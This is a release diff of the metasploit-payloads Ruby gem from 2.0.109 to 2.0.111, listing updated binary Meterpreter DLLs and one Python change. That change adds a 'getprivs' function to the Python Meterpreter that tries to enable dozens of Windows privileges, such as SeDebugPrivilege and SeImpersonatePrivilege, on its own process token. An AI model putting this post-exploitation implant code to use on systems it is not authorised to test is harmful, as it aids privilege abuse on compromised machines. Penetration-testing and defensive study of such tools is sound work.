metasploit-payloads 2.0.109 → 2.0.111

Sign up to get free protection for your applications and to get access to all the features.
Files changed (76) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/data/android/meterpreter.jar +0 -0
  4. data/data/android/metstage.jar +0 -0
  5. data/data/android/shell.jar +0 -0
  6. data/data/meterpreter/elevator.x64.debug.dll +0 -0
  7. data/data/meterpreter/elevator.x64.dll +0 -0
  8. data/data/meterpreter/elevator.x86.debug.dll +0 -0
  9. data/data/meterpreter/elevator.x86.dll +0 -0
  10. data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
  11. data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
  12. data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
  13. data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
  14. data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
  15. data/data/meterpreter/ext_server_espia.x64.dll +0 -0
  16. data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
  17. data/data/meterpreter/ext_server_espia.x86.dll +0 -0
  18. data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
  19. data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
  20. data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
  21. data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
  22. data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
  23. data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
  24. data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
  25. data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
  26. data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
  27. data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
  28. data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
  29. data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
  30. data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
  31. data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
  32. data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
  33. data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
  34. data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
  35. data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
  36. data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
  37. data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
  38. data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
  39. data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
  40. data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
  41. data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
  42. data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
  43. data/data/meterpreter/ext_server_priv.x64.dll +0 -0
  44. data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
  45. data/data/meterpreter/ext_server_priv.x86.dll +0 -0
  46. data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
  47. data/data/meterpreter/ext_server_python.x64.dll +0 -0
  48. data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
  49. data/data/meterpreter/ext_server_python.x86.dll +0 -0
  50. data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
  51. data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
  52. data/data/meterpreter/ext_server_stdapi.py +95 -7
  53. data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
  54. data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
  55. data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
  56. data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
  57. data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
  58. data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
  59. data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
  60. data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
  61. data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
  62. data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
  63. data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
  64. data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
  65. data/data/meterpreter/metsrv.x64.debug.dll +0 -0
  66. data/data/meterpreter/metsrv.x64.dll +0 -0
  67. data/data/meterpreter/metsrv.x86.debug.dll +0 -0
  68. data/data/meterpreter/metsrv.x86.dll +0 -0
  69. data/data/meterpreter/screenshot.x64.debug.dll +0 -0
  70. data/data/meterpreter/screenshot.x64.dll +0 -0
  71. data/data/meterpreter/screenshot.x86.debug.dll +0 -0
  72. data/data/meterpreter/screenshot.x86.dll +0 -0
  73. data/lib/metasploit-payloads/version.rb +1 -1
  74. data.tar.gz.sig +0 -0
  75. metadata +2 -2
  76. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: a667e59f354834de4c22bab9b2e20964c8da6c69d1a4ef5d90ddc66e45320fa0
4
- data.tar.gz: 2f10651bd6ade59a0d69c6ebd0ed8c636aceb1c86208827ad3130f9c968857e0
3
+ metadata.gz: 7909c1b37004dee1af5bed7dbe25381e5a3fcaba7a7d0ee4101f5e518aef6a36
4
+ data.tar.gz: e438b3747393682ffe47594ce438ed27086781602b524071aa73c51f7477e07a
5
5
  SHA512:
6
- metadata.gz: 75d36a853ef6d09e030061d997832e98e31a6f8682b9dda7c8715ef4cf6a91839de11def68602cb4af2fb700ee4ce623b265748d72caee34548e855ebe59858c
7
- data.tar.gz: 48d8b118e18a02b4415b35377ad9771b9f2a8bb2717e24cdbe2fe90a969727f3e7cf255783a3e08655da9fad1dc208556c6946cd1ff973e344b3237735405d8c
6
+ metadata.gz: cda77751aa1547b93c6be12c0fe4fbedafa915bf5f34a1931d6bef4e44ad6c7c0a89a96fbe6b4878c050a196aa9fd6032800341a38826b5718d0fa3695772240
7
+ data.tar.gz: d40c9e8db0fd4d02e8f8e807fc26ce095b6703548de0c74cce5ad514a9082cee4ebe3b0010d4f2ab1b978d93c79c7184249540839e52f89b1b3bdb7bc8c594b4
checksums.yaml.gz.sig CHANGED
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -489,6 +489,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
489
489
  TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
490
490
  TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
491
491
  TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
492
+ TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632
492
493
 
493
494
  ##
494
495
  # Fs
@@ -749,6 +750,25 @@ VER_PLATFORM_WIN32s = 0x0000
749
750
  VER_PLATFORM_WIN32_WINDOWS = 0x0001
750
751
  VER_PLATFORM_WIN32_NT = 0x0002
751
752
 
753
+ # Token Constants
754
+ TOKEN_ASSIGN_PRIMARY = 0x0001
755
+ TOKEN_DUPLICATE = 0x0002
756
+ TOKEN_IMPERSONATE = 0x0004
757
+ TOKEN_QUERY = 0x0008
758
+ TOKEN_QUERY_SOURCE = 0x0010
759
+ TOKEN_ADJUST_PRIVILEGES = 0x0020
760
+ TOKEN_ADJUST_GROUPS = 0x0040
761
+ TOKEN_ADJUST_DEFAULT = 0x0080
762
+ TOKEN_ADJUST_SESSIONID = 0x0100
763
+ TOKEN_ALL_ACCESS = 0xf01ff
764
+
765
+ # Privilege Constants
766
+ DISABLED = 0x0
767
+ SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1
768
+ SE_PRIVILEGE_ENABLED = 0x2
769
+ SE_PRIVILEGE_REMOVED = 0x4
770
+ SE_PRIVILEGE_USED_FOR_ACCESS = 0x800000000
771
+
752
772
  # Windows Access Controls
753
773
  MAXIMUM_ALLOWED = 0x02000000
754
774
 
@@ -855,7 +875,6 @@ def get_stat_buffer(path):
855
875
  return st_buf
856
876
 
857
877
  def get_token_user(handle):
858
- TOKEN_QUERY = 0x0008
859
878
  TokenUser = 1
860
879
  advapi32 = ctypes.windll.advapi32
861
880
  advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
@@ -1054,9 +1073,6 @@ def windll_GetVersion():
1054
1073
  return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
1055
1074
 
1056
1075
  def enable_privilege(name, enable=True):
1057
- TOKEN_ALL_ACCESS = 0xf01ff
1058
- SE_PRIVILEGE_ENABLED = 0x00000002
1059
-
1060
1076
  GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
1061
1077
  GetCurrentProcess.restype = ctypes.c_void_p
1062
1078
 
@@ -1216,6 +1232,81 @@ def stdapi_sys_config_getuid(request, response):
1216
1232
  response += tlv_pack(TLV_TYPE_USER_NAME, username)
1217
1233
  return ERROR_SUCCESS, response
1218
1234
 
1235
+ @register_function_if(has_windll)
1236
+ def stdapi_sys_config_getprivs(request, response):
1237
+ GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
1238
+ GetCurrentProcess.restype = ctypes.c_void_p
1239
+
1240
+ advapi32 = ctypes.windll.advapi32
1241
+ OpenProcessToken = advapi32.OpenProcessToken
1242
+ OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
1243
+ OpenProcessToken.restype = ctypes.c_bool
1244
+
1245
+ LookupPrivilegeValue = advapi32.LookupPrivilegeValueW
1246
+ LookupPrivilegeValue.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.POINTER(LUID)]
1247
+ LookupPrivilegeValue.restype = ctypes.c_bool
1248
+
1249
+ AdjustTokenPrivileges = advapi32.AdjustTokenPrivileges
1250
+ AdjustTokenPrivileges.argtypes = [ctypes.c_void_p, ctypes.c_bool, PTOKEN_PRIVILEGES, ctypes.c_uint32, PTOKEN_PRIVILEGES, ctypes.POINTER(ctypes.c_uint32)]
1251
+ AdjustTokenPrivileges.restype = ctypes.c_bool
1252
+
1253
+ token = ctypes.c_void_p()
1254
+ success = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token)
1255
+ if not success:
1256
+ return error_result_windows(), response
1257
+
1258
+ priv_list = [
1259
+ "SeAssignPrimaryTokenPrivilege",
1260
+ "SeAuditPrivilege",
1261
+ "SeBackupPrivilege",
1262
+ "SeChangeNotifyPrivilege",
1263
+ "SeCreatePagefilePrivilege",
1264
+ "SeCreatePermanentPrivilege",
1265
+ "SeCreateTokenPrivilege",
1266
+ "SeDebugPrivilege",
1267
+ "SeIncreaseBasePriorityPrivilege",
1268
+ "SeIncreaseQuotaPrivilege",
1269
+ "SeLoadDriverPrivilege",
1270
+ "SeLockMemoryPrivilege",
1271
+ "SeMachineAccountPrivilege",
1272
+ "SeProfileSingleProcessPrivilege",
1273
+ "SeRemoteShutdownPrivilege",
1274
+ "SeRestorePrivilege",
1275
+ "SeSecurityPrivilege",
1276
+ "SeShutdownPrivilege",
1277
+ "SeSystemEnvironmentPrivilege",
1278
+ "SeSystemProfilePrivilege",
1279
+ "SeSystemtimePrivilege",
1280
+ "SeTakeOwnershipPrivilege",
1281
+ "SeTcbPrivilege",
1282
+ "SeCreateGlobalPrivilege",
1283
+ "SeCreateSymbolicLinkPrivilege",
1284
+ "SeEnableDelegationPrivilege",
1285
+ "SeImpersonatePrivilege",
1286
+ "SeIncreaseWorkingSetPrivilege",
1287
+ "SeManageVolumePrivilege",
1288
+ "SeRelabelPrivilege",
1289
+ "SeSyncAgentPrivilege",
1290
+ "SeTimeZonePrivilege",
1291
+ "SeTrustedCredManAccessPrivilege",
1292
+ "SeDelegateSessionUserImpersonatePrivilege"
1293
+ ]
1294
+ for privilege in priv_list:
1295
+ luid = LUID()
1296
+ name = ctypes.create_unicode_buffer(privilege)
1297
+ success = LookupPrivilegeValue(None, name, luid)
1298
+ if success:
1299
+ size = ctypes.sizeof(TOKEN_PRIVILEGES)
1300
+ size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
1301
+ buffer = ctypes.create_string_buffer(size)
1302
+ tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
1303
+ tokenPrivileges.PrivilegeCount = 1
1304
+ tokenPrivileges.get_array()[0].Luid = luid
1305
+ tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED
1306
+ if AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None):
1307
+ response += tlv_pack(TLV_TYPE_PRIVILEGE, privilege)
1308
+ return ERROR_SUCCESS, response
1309
+
1219
1310
  @register_function
1220
1311
  def stdapi_sys_config_localtime(request, response):
1221
1312
  localtime = time.strftime("%Y-%m-%d %H:%M:%S %Z", time.localtime())
@@ -1374,8 +1465,6 @@ def stdapi_sys_process_get_processes_via_ps(request, response):
1374
1465
 
1375
1466
  def stdapi_sys_process_get_processes_via_windll(request, response):
1376
1467
  TH32CS_SNAPPROCESS = 2
1377
- TOKEN_QUERY = 0x0008
1378
- TokenUser = 1
1379
1468
  k32 = ctypes.windll.kernel32
1380
1469
  pe32 = PROCESSENTRY32()
1381
1470
  pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
@@ -1435,7 +1524,6 @@ def stdapi_sys_process_get_processes(request, response):
1435
1524
  return stdapi_sys_process_get_processes_via_windll(request, response)
1436
1525
  else:
1437
1526
  return stdapi_sys_process_get_processes_via_ps(request, response)
1438
- return ERROR_FAILURE, response
1439
1527
 
1440
1528
  @register_function_if(has_windll)
1441
1529
  def stdapi_sys_power_exitwindows(request, response):
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -1,6 +1,6 @@
1
1
  # -*- coding:binary -*-
2
2
  module MetasploitPayloads
3
- VERSION = '2.0.109'
3
+ VERSION = '2.0.111'
4
4
 
5
5
  def self.version
6
6
  VERSION
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: metasploit-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 2.0.109
4
+ version: 2.0.111
5
5
  platform: ruby
6
6
  authors:
7
7
  - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
96
96
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
97
97
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
98
98
  -----END CERTIFICATE-----
99
- date: 2023-01-30 00:00:00.000000000 Z
99
+ date: 2023-02-16 00:00:00.000000000 Z
100
100
  dependencies:
101
101
  - !ruby/object:Gem::Dependency
102
102
  name: rake
metadata.gz.sig CHANGED
Binary file